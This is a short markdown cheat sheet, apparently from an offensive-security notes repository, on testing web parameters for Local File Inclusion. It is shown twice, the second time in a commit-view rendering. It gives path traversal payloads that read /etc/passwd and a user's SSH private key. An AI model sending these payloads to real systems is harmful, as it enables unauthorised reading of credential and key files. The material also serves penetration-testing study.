killchain-compendium/exploit/web/local_file_inclusion.md

# Local File Inclusion
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).

## Usage

* Exploit URL parameter
```
http://example.com/home?page=about.html
```
    * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
    ```
    http://example.com/home?page=../../../../etc/passwd
    ```
    or
    ```
    http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
    ```
second commit 2021-08-23 01:13:54 +02:00			`# Local File Inclusion`
			To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).

			`## Usage`

			`* Exploit URL parameter`
			```
			`http://example.com/home?page=about.html`
			```
			`* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)`
			```
			`http://example.com/home?page=../../../../etc/passwd`
			```
			`or`
			```
			`http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa`
			```